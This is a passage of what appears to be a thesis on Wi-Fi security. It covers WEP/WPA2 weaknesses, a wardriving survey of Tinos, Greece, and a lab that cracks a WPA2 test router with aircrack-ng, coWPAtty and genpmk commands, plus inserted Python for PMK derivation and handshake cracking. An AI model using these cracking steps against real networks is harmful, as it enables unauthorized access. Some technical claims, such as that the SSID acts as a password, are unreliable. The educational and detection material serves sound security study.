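    """Encrypt two plaintexts under one keystream (what an IV repeat causes in
    WEP) and XOR the ciphertexts: the keystream cancels, leaving p1 XOR p2."""
    c1 = xor_bytes(p1, keystream)
    c2 = xor_bytes(p2, keystream)
    return xor_bytes(c1, c2)


if __name__ == "__main__":
    for bits in (24, 48):
        print(f"{bits}-bit IV: repeat more likely than not after "
              f"~{frames_for_even_odds(bits):,} frames")
    # Constructed keystream stand-in (random bytes, not real RC4 output).
    ks = os.urandom(16)
    p1 = b"GET /index.html "
    p2 = b"POST /login.php "
    assert keystream_reuse_leak(ks, p1, p2) == xor_bytes(p1, p2)
    print("ciphertext XOR equals plaintext XOR: keystream cancelled")
```

With a 24-bit IV a busy access point passes the even-odds point after a few thousand frames, i.e. within minutes; with 48 bits the same point is tens of millions of frames away, which is the practical difference the longer TKIP/CCMP counters make.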

3.2.4. WPA2 (Wi-Fi Protected Access Version 2)


The WPA2 encryption protocol is the successor of WPA. It is part of the 802.11i standard. Encryption is
performed with the CCMP algorithm, whose design is based on the CCM mode of the AES algorithm.

Image 16 - WPA2 implementation

With the introduction of the new algorithm, RC4 was replaced. Like TKIP, CCMP also uses a 48-bit
initialization vector, but instead of a per-packet sequence number it uses an AES key to
protect the confidentiality and integrity of the packet.
It uses a 48-bit initialization vector and a 128-bit encryption key, which minimizes
the vulnerability of the system to repeated (replay) attacks. The enhanced protection provided by CCMP in
comparison to TKIP requires more processing power, and often needs new or upgraded hardware.

3.3. Types of Attacks on wireless networks
Wireless networks, because of their transmission medium, are susceptible to attack. These attacks are
carried out for different purposes; for example, an attacker may simply want to monitor the traffic or to
gain access to a network.
Attacks on ad hoc wireless networks can be classified into two broad categories, namely passive and
active attacks.

3.3.1. Passive attacks


In this case an unauthorized party gains access to a network but does not modify any resources on the
network. There are two types of passive attacks:
- Traffic Analysis: Traffic analysis attacks are those in which the attacker gains information derived
from the access points, and thus learns the network name, the broadcast channel, the encryption
method and the MAC addresses of the participants.
- Packet Sniffing: Packet sniffing attacks operate in the same way as traffic analysis attacks, and here
too network information is disclosed. Moreover, the attacker has access to and can read the contents
of messages. If a message is encrypted, the attacker must decrypt it first. In addition to reading the
information, further characteristics of the packets become known.

3.3.2. Active attacks


An active attack attempts to alter or destroy the data being exchanged in the network, thereby disrupting
the normal functioning of the network.
These are divided into the following categories:
- Unauthorized Access
Unauthorized access attacks are not intended to harm any particular user, but to gain unauthorized
network access. In some network architectures, when an attacker enters a wireless network they acquire
all rights, while in others access to all network capabilities requires an authorized user, usually enforced
by Access Control Lists. However, access control lists can be circumvented by the technique of
spoofing. With this technique the attacker copies the network name and creates another network with a
stronger signal, causing computers to connect to the fake network and transmit all their data through it.
- Man in the Middle Attack
A man-in-the-middle attack (often abbreviated to MITM, MitM, MIM, MiM or MITMA) is an attack
where the attacker sits in the middle of the conversation, appearing to the access point as a user and to
the user as the access point.
- Denial of Service (DoS) Attack
This is the most widespread type of attack for rendering a wireless network unusable for some time. It
can be accomplished by sending a large number of packets to the network, so that the entire processing
capacity of the access point is consumed in handling them.
The most important types of DoS attacks are:
- Flood Attack
- Ping of Death
- SYN attack
- Smurf attack
EMPIRICAL PART 1
CHAPTER 4: LOCATION ANALYSIS IN TERMS OF WIRELESS NETWORKS SECURITY

4.1. About Wardriving

The term «Wardriving» describes the practice in which a user wanders through the streets of
neighbourhoods equipped with a device that has wireless access, in order to detect wireless networks and
map their existence for statistical or other reasons.
It took its name from a common practice of the 1980s known as «Wardialing», in which the "perpetrators"
dialled telephone numbers in order to locate dial-up modems, and then attempted to use these
modems illegally for access to telephone networks and subsequently to the internet.
Wardriving was first reported in the US in 2000, in a survey of wireless networks in the city of Berkeley,
California. This research aimed to show the security gaps of wireless networks, which were growing
rapidly in Berkeley, and that it was necessary to improve wireless network technology in terms of
information systems security.
The survey showed that access to a wireless network is possible, using simple tools, even over a long
distance from where the wireless transmitter is mounted.
Wardriving does not require expensive or hard-to-find equipment. It can be done using either a laptop
computer or a smartphone.

4.2. Wardriving Equipment

There are many tools for this type of attack. In our project we are going to use a smartphone and the
Android application Wigle.

Image 17 - Vodafone Smart 4 Review
Source: www.alphr.com

Image 18 - WigleWifi Wardriving Application at Google Play Store
Source: dalewifisec.wordpress.com

Specifically, the equipment we use is:
1. A smartphone, a Vodafone Smart 4 with Android version 4.4.2.
2. The Android application Wigle Wifi Wardriving, version 2.7. It is free.
3. A GPS receiver, provided by the smartphone itself.
4. Microsoft Excel 2010, needed for the data analysis.

4.2.1. Why a smartphone


A smartphone is a mobile phone with an advanced mobile operating system which
combines features of a personal computer operating system with other features useful for mobile or
handheld use.
They typically combine the features of a cell phone with those of other popular mobile devices, such
as a personal digital assistant (PDA), a media player and a GPS navigation unit.
Its operating system, Android, is also a good feature, as it is an open-source platform with numerous
capabilities. The billions of applications that exist for the Android platform can turn a smartphone
into a powerful device at low cost.
Especially for wardriving, a smartphone with an Android application can provide the same result as a
laptop with a wireless network card and a GPS receiver.

4.2.2. Wigle Wifi Wardriving Android Application


The WigleWifi Wardriving Android application is an open-source wardriving application for
net-stumbling, displaying and mapping discovered wireless networks and cell towers anywhere in the world.

Image 19– WigleWifiWardriving Android Application Framework

Source: andronexus.store.aptoide.com

WiGLE was started in 2001. Some of the features of the current version are:
- Export to CSV files on SD card (comma separated values).
- Export to KML files on SD card (to import into Google Maps/Earth).
- Local database to track new networks found.
- Real-time map of networks found (OpenStreetMap).
- Bluetooth GPS support through mock locations.
- Can move app to SD card.

4.3. Wardriving analysis in and around the central town of Tinos, Greek island


For the purposes of this project we decided to map the central town of Tinos, a Greek island, recording
on the map the route and the type of wireless networks detected. The study was conducted from September
20, 2015 to October 4, 2015. It covered a distance of approximately 46 km and recorded 1.416 wireless
networks.
First, to find the total number of wireless networks we had to identify and record the SSID (Service
Set Identifier) of each wireless network.
An SSID is a case-sensitive, 32-alphanumeric-character unique identifier attached to
the header of packets sent over a wireless local-area network (WLAN); it acts as a password when a
mobile device tries to connect to the basic service set (BSS), a component of the IEEE 802.11 WLAN
architecture.
The SSID differentiates one WLAN from another, so all access points and all devices attempting to
connect to a specific WLAN must use the same SSID to enable effective roaming.
So we turned on the Wigle application and wandered through the streets of the central town of Tinos to
discover all available wireless networks.
The next step was to export all data from the application to a file type suitable for analysis, such as
.CSV or .XLS.
The application can export data directly to these file types.

Image 20 - Data tab in WigleWardriving app

Source: andronexus.store.aptoide.com

We chose the DATA tab and then one of the choices:

- CSV Export Run
- CSV Export DB
The CSV format is suitable for Microsoft Excel and for drawing conclusions about the most common
wireless network security, the most used SSIDs and the most common channel on which wireless networks
are located. The difference between the above two choices is that CSV Export Run exports only the
networks picked up during a single session, whereas CSV Export DB exports the total
number of networks that have been scanned and stored in the database.
- KML Export Run
- KML Export DB
The above two choices concern a very important file type, suitable for Google Earth or Google
Maps. In this case, the exported KML file can be uploaded to Google Maps or Google Earth to show
directly all the locations of the discovered wireless networks. This is easier still if the Google Earth
application is installed on the smartphone: when the KML file is exported it is recognized by the Google
Earth application, and you can open the KML file directly with a double click to see the map with the
locations of the discovered wireless networks.
The following picture shows all the networks found in and around the central town of Tinos.

Image 21 - Wireless Networks in and around central town of Tinos Greek Island – Google Earth view

Image 22 shows the whole path that was followed.

Image 22 - Wardriving followed paths in and around central town of Tinos Greek Island – Google Earth view

4.3.1. Preparation process for analysis of data
For the CSV analysis we used Microsoft Excel 2013. To read the exported .CSV file, we followed these
steps:

Step 1. Click on the DATA tab -> From Text

Image 23 - Step 1 preview

Step 2. Find the CSV file and click on it -> Open

Image 24 - Step 2 preview

After completing the Text Import Wizard, the data of the CSV file were uniformly classified, as
in the following figure.

Image 25 - Uniformly classified data of CSV file

Step 3. Clean the data:
- Remove rows with the value GSM in the Type column.
- Remove duplicate rows with the same value in the MAC column.

After these modifications we had the result shown in Image 26:

Image 26 - Table of data after the right modification

4.4. Security analysis of wireless networks in and around the central town of Tinos, Greek
island - Results

Analyzing the CSV data we observed that 1.396 of the 1.416 wireless networks use WPA or WPA2
encryption, only 1,4% use the completely insecure WEP, while no network is left without encryption!
Table 1 displays the distribution of security protocols, while Graph 1 shows the distribution of
security protocols in percentage terms.

Security          Count       %
WEP               20,00       1,4
WPA or WPA2       1396,00     98,6
No Protection     0,00        0
Total             1416,00     100

Table 1. Wireless networks in and around central town of Tinos Greek island – Security Analysis of data

Graph 1. Wireless networks in and around central town of Tinos Greek island – Security Analysis of data
(pie chart of the shares of WEP, WPA or WPA2 and No Protection)
These results are explained by the following fact. In recent years, all providers and manufacturers of
wireless devices ship them with the WPA / WPA2 protocol preconfigured. The devices are shipped
to the end user with default, personalized settings. This means that each device has the WPA / WPA2
protocol enabled with a different predefined password. So it is very easy for someone to have
security on their wireless network without the necessary knowledge.

4.5. Channel analysis of wireless networks in and around the central town of Tinos, Greek
island - Results
Wireless networks in the 2.4 GHz frequency band use 13 different channels, each 22 MHz wide.
The channel analysis shows that the vast majority of networks use specific channels, namely channel 1,
channel 6 and channel 11. Most other channels remain substantially unused. This means that network
efficiency declines, errors and retransmissions increase, and data reliability may even be lost.

Channel     Count       %
1           433,00      30,6
2           60,00       4,23
3           27,00       1,91
4           32,00       2,26
5           19,00       1,34
6           300,00      21,19
7           35,00       2,47
8           27,00       1,91
9           114,00      8,05
10          36,00       2,54
11          281,00      19,83
12          15,00       1,06
13          37,00       2,61
Total       1416,00     100

Table 2. Wireless networks in and around central town of Tinos Greek island – Channel Analysis of data

Graph 2. Wireless networks in and around central town of Tinos Greek island – Channel Analysis of data
(bar chart of the number of networks per channel, channels 1 to 13)
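The cleaning and counting steps of sections 4.3.1, 4.4 and 4.5 (drop GSM rows, drop duplicate MACs, then tally security type and channel) can also be done without Excel. The Python below is an added example, not part of the thesis: it reads a small constructed CSV in the column layout that the WiGLE app's CSV export uses (assumed here: a one-line preamble, then a header with MAC, SSID, AuthMode, ..., Channel, ..., Type), classifies each network as WEP, WPA/WPA2 or unprotected from its AuthMode string, and produces the same kind of distribution tables. The sample rows, MAC addresses and coordinates are constructed, not survey data.

```python
import csv
from collections import Counter

# Constructed sample in the WiGLE CSV export layout (assumption of this example).
SAMPLE_CSV = """\
WigleWifi-1.4,appRelease=2.7,model=constructed,release=4.4.2,device=constructed,display=constructed,board=constructed,brand=constructed
MAC,SSID,AuthMode,FirstSeen,Channel,RSSI,CurrentLatitude,CurrentLongitude,AltitudeMeters,AccuracyMeters,Type
00:11:22:33:44:01,Wind_Wi_Fi,[WPA2-PSK-CCMP][ESS],2015-09-20 10:00:00,1,-60,37.5400,25.1600,10,5,WIFI
00:11:22:33:44:02,OTE-AB12,[WPA-PSK-TKIP][WPA2-PSK-CCMP][ESS],2015-09-20 10:01:00,6,-70,37.5401,25.1601,10,5,WIFI
00:11:22:33:44:03,Old-Router,[WEP][ESS],2015-09-20 10:02:00,11,-75,37.5402,25.1602,10,5,WIFI
00:11:22:33:44:04,Free-Cafe,[ESS],2015-09-20 10:03:00,6,-65,37.5403,25.1603,10,5,WIFI
00:11:22:33:44:01,Wind_Wi_Fi,[WPA2-PSK-CCMP][ESS],2015-09-21 11:00:00,1,-58,37.5400,25.1600,10,5,WIFI
202_01_1234_5678,,GSM;,2015-09-20 10:04:00,0,-80,37.5404,25.1604,10,5,GSM
"""


def load_networks(text):
    """Parse WiGLE CSV text into dict rows, skipping the app's preamble line."""
    lines = text.splitlines()
    if lines and lines[0].startswith("WigleWifi"):
        lines = lines[1:]
    return list(csv.DictReader(lines))


def clean(rows):
    """Step 3 of the thesis: keep only Wi-Fi rows (drops GSM cell towers) and
    drop repeated sightings of the same MAC, keeping the first one seen."""
    seen, kept = set(), []
    for row in rows:
        if row["Type"].strip().upper() != "WIFI":
            continue
        mac = row["MAC"].strip().upper()
        if mac in seen:
            continue
        seen.add(mac)
        kept.append(row)
    return kept


def classify_security(authmode):
    """Map an AuthMode string such as "[WPA2-PSK-CCMP][ESS]" to the thesis categories."""
    mode = authmode.upper()
    if "WPA" in mode:
        return "WPA or WPA2"
    if "WEP" in mode:
        return "WEP"
    return "No Protection"   # e.g. "[ESS]" alone: open network


def security_distribution(rows):
    return Counter(classify_security(r["AuthMode"]) for r in rows)


def channel_distribution(rows):
    return Counter(int(r["Channel"]) for r in rows)


def percentages(counter):
    """Turn counts into the percentage column of Tables 1 and 2."""
    total = sum(counter.values())
    return {k: round(100.0 * v / total, 2) for k, v in counter.items()}


if __name__ == "__main__":
    networks = clean(load_networks(SAMPLE_CSV))
    print(f"{len(networks)} unique Wi-Fi networks after cleaning")
    sec = security_distribution(networks)
    for name, pct in percentages(sec).items():
        print(f"{name:<14} {sec[name]:>4} {pct:>6.2f}%")
    for channel, count in sorted(channel_distribution(networks).items()):
        print(f"channel {channel:>2}: {count}")
```

Deduplicating by MAC before counting matters: the same access point seen on two days would otherwise be counted twice, inflating both the security and the channel totals.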
EMPIRICAL PART 2
CHAPTER 5: CRACKING SECURITY IN WIRELESS NETWORKS

In the previous chapter we saw one of the most common ways of analyzing the protection protocols
used by the wireless networks of a particular research area. As already noted above, the WPA
and WPA2 protection protocols are the most widespread in the study area because of the predetermined
procedure for enabling wireless network protection set by the manufacturer of the router
device.
In addition to the above research, and knowing that WPA2 is one of the most widely used security
protocols, we carry out a series of attacks to recover the encryption key of a test device, using the
powerful Kali Linux distribution.

5.1. About Linux, a good environment


Linux, or GNU/Linux, is a free and open-source Unix-like operating system for computers.
Its development is a characteristic example of voluntary cooperation within online communities; the whole
project is open source and freely available to all to copy, modify or redistribute without
restriction.

Image 27 - Tux the penguin, mascot of Linux

Source: en.wikipedia.org

It can be installed and run on a wide variety of computer systems, from small devices such as mobile
phones to large computer systems and supercomputers.
Linux distributions provide the kernel together with accompanying programs such as libraries, system
tools, a window system and many other applications required for the proper functioning of a computer.
A characteristic of distributions is the great configurability they offer, as each one is
addressed to a different kind of user.

5.2. About Kali Linux, the next generation of BackTrack


Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing.
It is maintained and funded by Offensive Security Ltd. Mati Aharoni, Devon Kearns and Raphaël
Hertzog are the core developers.

Image 28 - Kali Linux logo

Source: www.offensive-security.com

Kali Linux comes preinstalled with over 600 penetration-testing programs, including:

1. Nmap (a port scanner),
2. Kismet (a wireless network detector),
3. RFMON capability for 802.11 wireless network cards,
4. Wireshark (a packet analyzer),
5. John the Ripper (a password cracker),
6. Aircrack-ng (a software suite for penetration-testing wireless LANs),
7. Burp Suite and OWASP ZAP (both web application security scanners).

Kali Linux can run installed on a computer's hard disk, booted from a live CD or live USB,
or within a virtual machine. It is a supported platform of the Metasploit Project's Metasploit
Framework, a tool for developing and executing security exploits.
Kali Linux tools are classified into the following categories:
- INFORMATION GATHERING
- VULNERABILITY ANALYSIS
- WIRELESS ATTACKS
- WEB APPLICATIONS
- HARDWARE HACKING
- REVERSE ENGINEERING
- MAINTAINING ACCESS
- PASSWORD ATTACKS
- SNIFFING & SPOOFING
- STRESS TESTING
- FORENSICS TOOLS
- EXPLOITATION TOOLS
- REPORTING TOOLS

5.3. Equipment for Cracking Wireless Networks Security

For this type of attack we use specific tools: a conventional network card, the Kali Linux distribution
and a wireless network that uses WPA / WPA2 encryption.
In particular, for the attack we have used:

- Laptops
We have used two laptops for simulating the attack.

Image 29 - Samsung R530 preview

Source: www.cnet.com
The first one is a Samsung R530. The attacks were carried out using the integrated wireless
network card of this laptop.

Image 30 - HP Compaq 610 preview

Source: driverbasket.com

The second laptop was the target of the attacks. Its model is the HP Compaq 610q. It has an integrated
wireless network card that supports the IEEE 802.11b, IEEE 802.11g and IEEE 802.11n standards and the
WEP / WPA / WPA2 encryption methods.

- Wireless access point


The wireless access point that was attacked is the Huawei Echolife HG520c. It has 4
Ethernet ports and supports the IEEE 802.11b and IEEE 802.11g standards.

Image 31 - Huawei Echolife HG520c preview

Source: websec.ca
For the attacks, WPA2 encryption with SSID «Wind_Wi_Fi» and password
«tinosemagazine11» was configured.

5.4. Preparation of attack


In WPA / WPA2, the user enters a passphrase which is not itself involved in sending the encrypted
packets, but is combined with the MAC address of each client station and, together with the 48-bit
initialization vector, generates the key with which the data will be encrypted.
Therefore, the key protecting the transmitted packets is different for each device. The attacker will try to
compromise the wireless network at the moment a station connects to the access point (the
handshake), because these packets certainly contain the secret keyword that has been set as the
authentication key for the network.
Using specialized applications, the attacker will attempt to identify users connected to the wireless
network and collect the necessary packets. To obtain these packets, the attacker has two options:
- either to wait for a user to connect successfully to the access point,
- or to force an already connected user to disconnect, so that on reconnecting new «handshake»
packets are created.
After the «handshake» packets (which contain the secret key) have been captured, they are analyzed by
applications that perform dictionary attacks.
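The second option above, forcing a connected client off the network so that it re-authenticates, works through deauthentication or disassociation management frames, which are not authenticated unless 802.11w management frame protection is in use. A defender watching a monitor-mode capture can spot such a burst easily. The Python below is an added example, not from the thesis: it parses constructed management-frame log lines (the line format is an assumption of this example) and raises an alert when one source address sends more deauthentication/disassociation frames than a threshold within a sliding time window. MAC addresses and timestamps are constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed management-frame log (not a capture from the thesis's test network).
# Assumed line format: "<timestamp> <subtype> src=<mac> dst=<mac> reason=<code>".
# MAC addresses are locally administered placeholders.
SAMPLE_LOG = "\n".join(
    [f"2015-09-20T10:00:00.{i * 20:06d} deauth src=02:00:00:00:aa:01 "
     f"dst=ff:ff:ff:ff:ff:ff reason=7" for i in range(30)]
    + [
        "2015-09-20T10:00:01.000000 beacon src=02:00:00:00:aa:01 dst=ff:ff:ff:ff:ff:ff reason=0",
        "2015-09-20T10:00:02.000000 deauth src=02:00:00:00:bb:02 dst=02:00:00:00:aa:01 reason=3",
        "2015-09-20T10:05:00.000000 deauth src=02:00:00:00:aa:01 dst=02:00:00:00:cc:03 reason=1",
    ]
)

LINE_RE = re.compile(
    r"^(\S+)\s+(\w+)\s+src=([0-9a-fA-F:]{17})\s+dst=([0-9a-fA-F:]{17})\s+reason=(\d+)$")


def parse_line(line):
    """Return a dict for one log line, or None if the line does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {
        "ts": datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%S.%f"),
        "subtype": m.group(2).lower(),
        "src": m.group(3).lower(),
        "dst": m.group(4).lower(),
        "reason": int(m.group(5)),
    }


def detect_deauth_floods(log_text, window_seconds=10, threshold=20):
    """Alert when one source sends >= threshold deauth/disassoc frames within
    a sliding window. A burst to the broadcast address knocks every client off
    at once, so that case is flagged in the alert."""
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)   # src MAC -> timestamps inside the window
    alerts = []
    for line in log_text.splitlines():
        frame = parse_line(line)
        if frame is None or frame["subtype"] not in ("deauth", "disassoc"):
            continue
        q = recent[frame["src"]]
        q.append(frame["ts"])
        while q and frame["ts"] - q[0] > window:
            q.popleft()              # drop timestamps that fell out of the window
        if len(q) >= threshold:
            alerts.append({
                "src": frame["src"],
                "count": len(q),
                "first": q[0],
                "last": frame["ts"],
                "broadcast": frame["dst"] == "ff:ff:ff:ff:ff:ff",
            })
            q.clear()                # one alert per burst, not one per frame
    return alerts


if __name__ == "__main__":
    for alert in detect_deauth_floods(SAMPLE_LOG):
        print(f"deauth flood from {alert['src']}: {alert['count']} frames between "
              f"{alert['first'].time()} and {alert['last'].time()}, "
              f"broadcast={alert['broadcast']}")
```

A single deauthentication from an access point is normal housekeeping (the isolated frame at 10:05 in the sample is ignored); tens of them per second, especially to the broadcast address, are not, and the alert is where a wireless IDS would log the source MAC and the time for follow-up.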

5.4.1. Dictionary attack
The dictionary attack is a method of cracking a wireless network. It is very efficient and fast because many
computer users insist on using common passwords.
Usually such dictionaries contain all possible combinations of 8-character words. It turns out that
words less than 20 characters long are statistically unable to withstand this kind of attack. Dictionary
attacks are rarely successful against systems that use multi-word passphrases, and are unsuccessful
against systems that use random combinations of upper- and lower-case letters together with
numbers and symbols.

5.4.2. Pre-computed hashes


Pre-computed hash files are (quite large) files which contain already-calculated hashes for a series of
passwords. The point is that these files greatly reduce the time of a dictionary attack, since the hash for
each password has already been calculated and only remains to be compared with the one captured.
In WPA, the hash results from the chosen password in combination with the SSID. So the
hashes calculated in these files apply only to specific SSIDs, which are those normally
used by default (e.g. linksys, netgear).
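Section 3.2.2.2 describes the PBKDF2 step that turns the 8 to 63 character passphrase into the 256-bit key, and this section explains why pre-computed hash files are tied to an SSID. Both follow from the same derivation, which in IEEE 802.11i is PBKDF2-HMAC-SHA1 with the passphrase as the password, the SSID as the salt, 4096 iterations and 32 bytes of output. The Python below is an added example, not code from the thesis or from aircrack-ng/coWPAtty: it derives the PMK for a given passphrase and SSID, checks it against the standard's published test vector, and shows that changing the SSID (even only its case) produces an unrelated PMK, which is why a table computed for a default SSID such as linksys is useless against a network with its own SSID. The default-SSID list is a constructed illustration.

```python
import hashlib

PBKDF2_ITERATIONS = 4096   # iteration count fixed by IEEE 802.11i for WPA/WPA2-PSK
PMK_LENGTH = 32            # 256-bit Pairwise Master Key

# Constructed illustration of SSIDs that vendors ship by default: the thesis
# names linksys and netgear, the rest are assumptions of this example.
DEFAULT_SSIDS = {"linksys", "netgear", "default", "dlink", "wireless"}


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(password=passphrase, salt=ssid, 4096 rounds, 32 bytes)."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8 to 63 characters")
    return hashlib.pbkdf2_hmac(
        "sha1",
        passphrase.encode("ascii"),
        ssid.encode("utf-8"),
        PBKDF2_ITERATIONS,
        PMK_LENGTH,
    )


def pmk_depends_on_ssid(passphrase: str, ssid_a: str, ssid_b: str) -> bool:
    """True when the same passphrase yields different PMKs under the two SSIDs,
    i.e. a table pre-computed for ssid_a cannot be reused for ssid_b."""
    return wpa_pmk(passphrase, ssid_a) != wpa_pmk(passphrase, ssid_b)


def uses_default_ssid(ssid: str) -> bool:
    """Defender check: is this SSID one for which pre-computed tables commonly exist?"""
    return ssid.lower() in DEFAULT_SSIDS


if __name__ == "__main__":
    # Known-answer test from the IEEE 802.11i test vectors (passphrase "password", SSID "IEEE").
    print("PMK(password, IEEE) =", wpa_pmk("password", "IEEE").hex())
    # The thesis's own SSID versus a vendor default SSID, same passphrase.
    print("different PMK under another SSID:",
          pmk_depends_on_ssid("tinosemagazine11", "Wind_Wi_Fi", "linksys"))
    print("Wind_Wi_Fi is a default SSID:", uses_default_ssid("Wind_Wi_Fi"))
```

The 4096 iterations are what make each dictionary entry cost thousands of HMAC computations (the figures in the Keys/s column of Table 3 reflect that), and the SSID salt is what forces the pre-computation in sections 5.6 and 5.8 to be redone per network; a non-default SSID and a long passphrase together are the configuration-side defence this derivation suggests.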

5.5. The Aircrack-ng suite


For this kind of attack we will use, as part of our research, the "Aircrack" suite that is included in the
Kali Linux distribution.
The "Aircrack-ng" suite is a very important suite that offers powerful tools for recovering the key used
to secure a wireless network. Below we present all the steps that must be followed in order to
retrieve the encryption key (the key of the client) of a wireless network, both in the case of a dictionary
attack and in the case of an attack with pre-computed hashes.

The aircrack-ng suite includes:
 airmon-ng
 airodump-ng
 aireplay-ng
 aircrack-ng
 airolib-ng

5.5.1. About Airmon-ng
First, to be able to carry out the attack we must put the network card of the attacking computer into
monitor mode. That is done with "Airmon-ng".
"Airmon-ng" is used to put our network card in monitor mode.
Usage
airmon-ng {start|stop} {interface}
where
start|stop determines whether to activate or deactivate monitor mode on our wireless card.
interface specifies the network card on which you want to enable / disable monitor mode.

Image 32 - The wireless card in monitor mode

5.5.2 About Airodump-ng

After that, we start capturing packets and collecting IVs. For this purpose "Airodump-ng" is used.
"Airodump-ng" is used to capture packets from 802.11 networks and to collect IVs (Initialization
Vectors). It can also be used to identify the 802.11 networks that are within range of our card.

Usage
airodump-ng {interface}
where
interface specifies the network card that will be used to record packets.

Image 33 - Collection of Initialization Vectors (IVs)

Analyzing the capture screen of "Airodump-ng":

- The BSSID column shows the MAC addresses of the access points in range of our card.
- The PWR column shows the signal strength.
- The Beacons column shows the number of beacon frames received from each AP.
- The #Data column shows the data packets received from each AP.
- The #/s column shows the rate at which data packets are exchanged with the AP.
- The CH column shows the channel on which the AP operates.
- The ENC column shows the type of encryption used.
- The ESSID column shows the name of the network.

When clients are connected to an AP, the following client details are shown:
- The address of the AP to which the client is connected appears under BSSID.
- Under Station the MAC address of the client is shown.
- Under Packets the number of packets recorded for this client is shown.

In order to obtain the packets sent by the access point of interest more quickly, and to record the
packets that will be injected, we need to focus on that specific access point.
Usage
airodump-ng --channel 1 --write Wind_Wi_Fi --bssid 4C:ED:DE:1E:96:8E wlan0mon

Image 34 - "Concept" of the handshake packet

Image 35 - "Concept" of the handshake packet

The options that we have used are:

--channel: specifies the channel.
--bssid: specifies the MAC address of the target access point.

5.5.3. Aircrack-ng

"Aircrack-ng" is a tool used to crack the encryption key of an access point. It is the first of the four
attacks that will be performed in this investigation, in an attempt to determine which of these attacks is
the fastest and most effective. Like most attack tools, "aircrack-ng" uses the capture of IVs and a
dictionary file.

Usage
- aircrack-ng [options] {capture file(s)}
- aircrack-ng Wind_Wi_Fi-01.cap -w dictionary.txt

Image 36 - Aircrack-ng in process

Image 37 - Aircrack-ng in process

5.6. Airolib-ng & Aircrack-ng

The second attack is again performed with "Aircrack", but in combination with "Airolib-ng" and this time
using another attack method, pre-computed hashes.
"Airolib-ng" is used to store and manage ESSID and password lists and to compute the Pairwise
Master Keys (PMKs). The program uses an SQLite3 database, which is available for many platforms and
manages memory and disk space better. It gives us the possibility to pre-compute the PMKs for use in
the future.

Image 38 - Attack using database

Image 39 - Attack using database

5.7. coWPAtty
"Aircrack-ng" is a powerful tool, but it has some limitations. A more powerful attack tool is
"coWPAtty". It was created by Joshua Wright and, as a good tool, it can be combined with popular password
cracking tools such as «John the Ripper».
It is a dictionary attack tool which requires capturing at least 2 frames of the 4-way handshake.
"coWPAtty" is the tool that we will use as the second form of dictionary attack. We have to specify the
dictionary file, the SSID of the network and the capture of IVs.
Usage
cowpatty -s Wind_Wi_Fi -r Wind_Wi_Fi-01.cap -f dictionary.txt

Image 40 - CoWPAtty in process

Image 41 - CoWPAtty in process

5.8. genpmk & coWPAtty
The "genpmk" command is a tool used to create pre-computed hash files. It is a different tool for
attacking with pre-computed hashes. There is a dependence on the SSID of the access point, which
means that we need a different hash set for each unique SSID.
Usage
- genpmk -s Wind_Wi_Fi -d Wind_Wi_Fi.hash -f dictionary.txt
- cowpatty -s Wind_Wi_Fi -r Wind_Wi_Fi-01.cap -d Wind_Wi_Fi.hash

Image 42 - Preparation with genpmk

Image 43 - Preparation with genpmk

Image 44 - Attack using pre-computed hashes

Image 45 - Attack using pre-computed hashes
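The four attacks above all do the same computation: derive a PMK from each dictionary word with
PBKDF2-HMAC-SHA1 (salted with the SSID, 4096 rounds), expand it to the PTK with the two MAC
addresses and nonces from the handshake, and compare the MIC computed with the KCK against the
MIC in the captured EAPOL frame. The pre-computed-hash tools (airolib-ng, genpmk) only move the
slow PBKDF2 step out of the loop. The following Python program is an added illustration of that
process, not code from this thesis or from aircrack-ng or coWPAtty. It constructs its own handshake
in-script from a made-up passphrase, fixed MAC addresses and nonces, and a simplified EAPOL-Key
message 2 (key data left empty), so nothing is captured from a real network; the wordlist is likewise
constructed. It also shows why a hash table built for one SSID is useless against another.

```python
"""WPA/WPA2-PSK handshake cracking as aircrack-ng and coWPAtty do it, with the
genpmk / airolib-ng style PMK precomputation. Added illustration; not the
thesis's code nor the tools' own. Everything below is constructed in-script."""
import hashlib
import hmac
from dataclasses import dataclass
from typing import Dict, Iterable, Optional

# Offset of the 16-byte MIC inside an EAPOL-Key frame:
# EAPOL hdr 4 + descriptor 1 + key info 2 + key len 2 + replay ctr 8 + nonce 32 + IV 16 + RSC 8 + ID 8
EAPOL_MIC_OFFSET = 81


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 rounds, 32 bytes).
    The SSID is the salt: a table of PMKs (genpmk, airolib-ng) is valid for one SSID only."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """IEEE 802.11i PRF-512: PTK = PRF(PMK, "Pairwise key expansion", min/max MACs || min/max nonces).
    KCK = PTK[0:16] is the only part needed to check the handshake MIC."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    blocks = (hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4))
    return b"".join(blocks)[:64]


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """WPA2 key descriptor version 2: MIC = HMAC-SHA1(KCK, frame with MIC field zeroed)[:16]."""
    zeroed = eapol[:EAPOL_MIC_OFFSET] + b"\x00" * 16 + eapol[EAPOL_MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """Minimal EAPOL-Key message 2 (key data left empty; a real frame carries the RSN IE)."""
    body = (b"\x02"                      # descriptor type: RSN
            + b"\x01\x0a"                # key info: version 2, pairwise, MIC present
            + b"\x00\x10"                # key length 16
            + b"\x00" * 7 + b"\x01"      # replay counter
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # nonce, IV, RSC, key ID
            + mic + b"\x00\x00")         # MIC, key data length 0
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body   # EAPOL v1, type EAPOL-Key


@dataclass
class Handshake:
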